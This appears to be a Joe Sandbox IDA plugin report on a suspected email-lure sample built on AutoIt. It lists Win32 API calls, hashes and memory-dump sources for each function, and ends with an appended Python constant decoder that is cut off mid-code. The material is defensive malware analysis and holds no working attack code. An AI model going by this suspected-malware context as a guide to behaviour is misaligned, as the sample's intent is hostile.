                                                                                                          • Opcode Fuzzy Hash: 378f32a4c92103bbd93a3b86b08f3c5a6c6126137a3772f7e66fb181e54c8794
                                                                                                          • Instruction Fuzzy Hash: 45514F71901208FFDF109FA4DC48E9E7BB9FB08320F158226F912AB2A1D7799940DB54
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8AC1
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8AD2
                                                                                                          • CharNextW.USER32(0000014E), ref: 007D8B01
                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8B42
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8B58
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8B69
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8B86
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 007D8BD8
                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8BEE
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8C1F
                                                                                                          • _memset.LIBCMT ref: 007D8C44
                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8C8D
                                                                                                          • _memset.LIBCMT ref: 007D8CEC
                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8D16
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8D6E
                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 007D8E1B
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007D8E3D
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D8E87
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D8EB4
                                                                                                          • DrawMenuBar.USER32(?), ref: 007D8EC3
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 007D8EEB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1073566785-4108050209
                                                                                                          • Opcode ID: e48d405f16d3010a2818bb40f1b4cb0523ee4b45c96b6d97821fb1c3771c6a07
                                                                                                          • Instruction ID: 3a904b0c07838fc184c70360c3b243ccd72b0c418def337df029bee432a6cc2d
                                                                                                          • Opcode Fuzzy Hash: e48d405f16d3010a2818bb40f1b4cb0523ee4b45c96b6d97821fb1c3771c6a07
                                                                                                          • Instruction Fuzzy Hash: 7EE17F70901208EFDF609F64CC88EEE7B79EF49710F148157F929AA290DB789981DF61
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 007D49CA
                                                                                                          • GetDesktopWindow.USER32 ref: 007D49DF
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007D49E6
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007D4A48
                                                                                                          • DestroyWindow.USER32(?), ref: 007D4A74
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4A9D
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4ABB
                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4AE1
                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 007D4AF6
                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4B09
                                                                                                          • IsWindowVisible.USER32(?), ref: 007D4B29
                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4B44
                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4B58
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007D4B70
                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4B96
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 007D4BB0
                                                                                                          • CopyRect.USER32(?,?), ref: 007D4BC7
                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 007D4C32
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                          • API String ID: 698492251-4156429822
                                                                                                          • Opcode ID: 33bcbff9510c5bba5fb7c7dca5ffe02ae3408d99ff2c0cecd85e0b366526f645
                                                                                                          • Instruction ID: e976aed086dcb47d5d782ca6509063775faa8b2b41fcba3ee8cc666373d5fc6b
                                                                                                          • Opcode Fuzzy Hash: 33bcbff9510c5bba5fb7c7dca5ffe02ae3408d99ff2c0cecd85e0b366526f645
                                                                                                          • Instruction Fuzzy Hash: 2AB15871604340EFDB04DF65C849B6ABBF5BF88310F00891EF99A9B2A1D779E805CB95
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007B44AC
                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007B44D2
                                                                                                          • _wcscpy.LIBCMT ref: 007B4500
                                                                                                          • _wcscmp.LIBCMT ref: 007B450B
                                                                                                          • _wcscat.LIBCMT ref: 007B4521
                                                                                                          • _wcsstr.LIBCMT ref: 007B452C
                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B4548
                                                                                                          • _wcscat.LIBCMT ref: 007B4591
                                                                                                          • _wcscat.LIBCMT ref: 007B4598
                                                                                                          • _wcsncpy.LIBCMT ref: 007B45C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 699586101-1459072770
                                                                                                          • Opcode ID: f586b6cbb9551b3b51a7568551f6d6bf06f8ac8eae0e5d18b671532e7a929d9d
                                                                                                          • Instruction ID: a934175d6dc6767edee8c04ea08d07b89851cde8e45b5375cbe7d0d11b5d0c96
                                                                                                          • Opcode Fuzzy Hash: f586b6cbb9551b3b51a7568551f6d6bf06f8ac8eae0e5d18b671532e7a929d9d
                                                                                                          • Instruction Fuzzy Hash: 8E41D871600204FADB10AA748C0BFFF777CDF42750F04806AF959E6283EA7D9A1196A9
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 007528C4
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 007528F7
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0075291C
                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007529CA
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                                                                                                            • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                            • Part of subcall function 00752344: ScreenToClient.USER32(008157B0,?), ref: 00752374
                                                                                                            • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                            • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                          • API String ID: 1458621304-248962490
                                                                                                          • Opcode ID: 908ac30c682fd4b0421989b08f15361c4df830dbcc3a23b5143582f2c8f1dda2
                                                                                                          • Instruction ID: efb37c3c1d24349494ec307732b8cf7422edfe26dd634f8d42f3ae6e8e58512c
                                                                                                          • Opcode Fuzzy Hash: 908ac30c682fd4b0421989b08f15361c4df830dbcc3a23b5143582f2c8f1dda2
                                                                                                          • Instruction Fuzzy Hash: 43B17F71A00209DFDB15DFA8DC89BEE7BB4FB48311F108129FE16A6290DB78A855CB54
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 007AA47A
                                                                                                          • __swprintf.LIBCMT ref: 007AA51B
                                                                                                          • _wcscmp.LIBCMT ref: 007AA52E
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AA583
                                                                                                          • _wcscmp.LIBCMT ref: 007AA5BF
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 007AA5F6
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007AA648
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007AA67E
                                                                                                          • GetParent.USER32(?), ref: 007AA69C
                                                                                                          • ScreenToClient.USER32(00000000), ref: 007AA6A3
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 007AA71D
                                                                                                          • _wcscmp.LIBCMT ref: 007AA731
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 007AA757
                                                                                                          • _wcscmp.LIBCMT ref: 007AA76B
                                                                                                            • Part of subcall function 0077362C: _iswctype.LIBCMT ref: 00773634
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 3744389584-679674701
                                                                                                          • Opcode ID: 36d6a7816ac077c9f4e333e85dac1e7ff3799e8cd08eac606924142a12459866
                                                                                                          • Instruction ID: ac6816394cc1750a0966771fbb98ee283ef7386861c0d59a7f9952e1765b9ec7
                                                                                                          • Opcode Fuzzy Hash: 36d6a7816ac077c9f4e333e85dac1e7ff3799e8cd08eac606924142a12459866
                                                                                                          • Instruction Fuzzy Hash: 26A1B171204206FBDB15DF64C888BAAB7E8FF85354F108629F999C2190DB38E955CB92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 007AAF18
• _wcscmp.LIBCMT ref: 007AAF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 007AAF51
• CharUpperBuffW.USER32(?,00000000), ref: 007AAF6E
• _wcscmp.LIBCMT ref: 007AAF8C
• _wcsstr.LIBCMT ref: 007AAF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 007AAFD5
• _wcscmp.LIBCMT ref: 007AAFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 007AB055
• _wcscmp.LIBCMT ref: 007AB065
• GetClassNameW.USER32(00000010,?,00000400), ref: 007AB08D
• GetWindowRect.USER32(00000004,?), ref: 007AB0F6
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 54fae5b72c686a33d558aee415333263dfeb9eec1d9598abca68649c749443ef
• Instruction ID: 4cceea483f892e858d1b5ad32c9c1b5d66dbbf95ce7acefc7bf68525eebd4134
• Opcode Fuzzy Hash: 54fae5b72c686a33d558aee415333263dfeb9eec1d9598abca68649c749443ef
• Instruction Fuzzy Hash: 2D819171108309EFDB05DF14C885FAA77E8EF85354F14866AFD898A092DB38DD49CB61
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: bfa6c9845f90eedc3574bd113c38d7d4f6599e09069f3181a1b3dec67939d906
• Instruction ID: 26156b0cac84883a7abff045781e68d22845c6561733609c8e9986101e0ce723
• Opcode Fuzzy Hash: bfa6c9845f90eedc3574bd113c38d7d4f6599e09069f3181a1b3dec67939d906
• Instruction Fuzzy Hash: C931D270A48205FBEA54EA50DD0BEEE7368EF10761F200128F816B11D1EF9D6F08D662
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 007C5013
• LoadCursorW.USER32(00000000,00007F00), ref: 007C501E
• LoadCursorW.USER32(00000000,00007F03), ref: 007C5029
• LoadCursorW.USER32(00000000,00007F8B), ref: 007C5034
• LoadCursorW.USER32(00000000,00007F01), ref: 007C503F
• LoadCursorW.USER32(00000000,00007F81), ref: 007C504A
• LoadCursorW.USER32(00000000,00007F88), ref: 007C5055
• LoadCursorW.USER32(00000000,00007F80), ref: 007C5060
• LoadCursorW.USER32(00000000,00007F86), ref: 007C506B
• LoadCursorW.USER32(00000000,00007F83), ref: 007C5076
• LoadCursorW.USER32(00000000,00007F85), ref: 007C5081
• LoadCursorW.USER32(00000000,00007F82), ref: 007C508C
• LoadCursorW.USER32(00000000,00007F84), ref: 007C5097
• LoadCursorW.USER32(00000000,00007F04), ref: 007C50A2
• LoadCursorW.USER32(00000000,00007F02), ref: 007C50AD
• LoadCursorW.USER32(00000000,00007F89), ref: 007C50B8
• GetCursorInfo.USER32(?), ref: 007C50C8
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: d86f26a7dd7eaddadb97d0871dc204a22720785b17dc61ee9968a875e65f68ab
• Instruction ID: ad0d0c62855d954d35941d20346e6db6f531298af142e8c6af294c3afc5e42d6
• Opcode Fuzzy Hash: d86f26a7dd7eaddadb97d0871dc204a22720785b17dc61ee9968a875e65f68ab
• Instruction Fuzzy Hash: 7231E1B1D4831DAADF109FB68C89DAFBFE8FB04750F50452AA50DE7280DA79A5408E91
APIs
• _memset.LIBCMT ref: 007DA259
• DestroyWindow.USER32(?,?), ref: 007DA2D3
  • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA382
• DestroyWindow.USER32(00000000), ref: 007DA3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA3F4
• GetDesktopWindow.USER32 ref: 007DA40D
• GetWindowRect.USER32(00000000), ref: 007DA414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA444
  • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: d8ffc27c035aa2c2cce6498f0ea4e4b5599015b93adf8378a88fec750a8440e0
• Instruction ID: 6179f3aef6b7ae3b0fc2b7529a098f913c184928a1fae5b989e26c91d5f3aeb0
• Opcode Fuzzy Hash: d8ffc27c035aa2c2cce6498f0ea4e4b5599015b93adf8378a88fec750a8440e0
• Instruction Fuzzy Hash: F3716B70140245AFD725CF28CC49FA677FAFB88300F04852EF985872A1DBB8E906CB56
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• DragQueryPoint.SHELL32(?,?), ref: 007DC627
  • Part of subcall function 007DAB37: ClientToScreen.USER32(?,?), ref: 007DAB60
  • Part of subcall function 007DAB37: GetWindowRect.USER32(?,?), ref: 007DABD6
  • Part of subcall function 007DAB37: PtInRect.USER32(?,?,007DC014), ref: 007DABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 007DC690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC6BE
• _wcscat.LIBCMT ref: 007DC6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC705
• SendMessageW.USER32(?,000000B0,?,?), ref: 007DC71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 007DC735
• SendMessageW.USER32(?,000000B1,?,?), ref: 007DC757
• DragFinish.SHELL32(?), ref: 007DC75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DC851
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: fb6ea3d0e89512cd691b00b895be113703798454b1b51bc154560cb7c437fbb3
• Instruction ID: 499463d24530f8442bd1811007d22aa4cd32f544a0f20f7c56ae75a38e9d64b4
• Opcode Fuzzy Hash: fb6ea3d0e89512cd691b00b895be113703798454b1b51bc154560cb7c437fbb3
• Instruction Fuzzy Hash: 24612A71508301EFC701DF64DC89D9BBBF8EF89710F00492EF595962A1DB78AA49CB52
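The call lists in these function cards print window messages and cursor resource IDs as raw hex (SendMessageW with 000000C2, DefDlgProcW with 00000233, LoadCursorW with 00007F8A and so on), which is hard to read at a glance. The Python below is an added example and not part of the Joe Sandbox report or its tooling: it parses lines in the report's own "Func.MODULE(args), ref: ADDR" format, including the "Part of subcall function" prefix and "?" for arguments the disassembler could not resolve, and resolves the message and cursor constants to their documented Win32 names. The constant tables are the standard Win32 values; the five sample lines are copied from the cards above. The sixteen LoadCursorW(NULL, IDC_*) calls followed by GetCursorInfo decode to one call for every predefined cursor, i.e. the function identifies the current cursor by comparing handles, and the DefDlgProcW message decodes to WM_DROPFILES, matching the @GUI_DRAGFILE strings in the same card.

```python
"""Decode Joe Sandbox per-function API call lines into structured records.

Added example, not part of the Joe Sandbox report. Parses the report's line
format '• Func.MODULE(arg,arg,...), ref: ADDR' and resolves Win32 constants
only where the argument position is unambiguous (message ID of SendMessageW
/ DefDlgProcW, resource ID of LoadCursorW with a NULL hInstance).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Documented Win32 window-message values that appear in the call lists above.
WM_NAMES = {
    0x00B0: "EM_GETSEL",
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x0170: "STM_SETICON",
    0x0233: "WM_DROPFILES",
    0x0418: "TTM_SETMAXTIPWIDTH",  # WM_USER + 24
    0x0421: "TTM_SETTITLEW",       # WM_USER + 33
    0x0432: "TTM_ADDTOOLW",        # WM_USER + 50
    0x0433: "TTM_DELTOOLW",        # WM_USER + 51
    0x1105: "TVM_GETCOUNT",        # TV_FIRST + 5
}

# Predefined cursor resource IDs (IDC_*) passed as LoadCursorW(NULL, id).
IDC_NAMES = {
    0x7F00: "IDC_ARROW", 0x7F01: "IDC_IBEAM", 0x7F02: "IDC_WAIT",
    0x7F03: "IDC_CROSS", 0x7F04: "IDC_UPARROW", 0x7F80: "IDC_SIZE",
    0x7F81: "IDC_ICON", 0x7F82: "IDC_SIZENWSE", 0x7F83: "IDC_SIZENESW",
    0x7F84: "IDC_SIZEWE", 0x7F85: "IDC_SIZENS", 0x7F86: "IDC_SIZEALL",
    0x7F88: "IDC_NO", 0x7F89: "IDC_HAND", 0x7F8A: "IDC_APPSTARTING",
    0x7F8B: "IDC_HELP",
}

# Calls whose second argument is a window message.
MESSAGE_CALLS = {"SendMessageW", "SendMessageA", "PostMessageW", "DefDlgProcW", "DefWindowProcW"}

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]  # None stands for '?' (unresolved by the disassembler)


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int                               # call-site address
    args: List[Arg] = field(default_factory=list)
    subcall_of: Optional[int] = None       # set for "Part of subcall function" lines
    note: str = ""                         # decoded constant name, if any


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):   # Joe prints numeric args as 8 hex digits
        return int(tok, 16)
    return tok                                  # a resolved literal such as tooltips_class32


def _decode(c: ApiCall) -> str:
    if c.func in MESSAGE_CALLS and len(c.args) > 1 and isinstance(c.args[1], int):
        return WM_NAMES.get(c.args[1], f"msg 0x{c.args[1]:04X}")
    if c.func == "LoadCursorW" and len(c.args) == 2 and c.args[0] == 0 and isinstance(c.args[1], int):
        return IDC_NAMES.get(c.args[1], f"cursor 0x{c.args[1]:04X}")
    return ""


def parse_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for an API line, or None for any other report line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
    call = ApiCall(func=m["func"], module=m["mod"], ref=int(m["ref"], 16), args=args,
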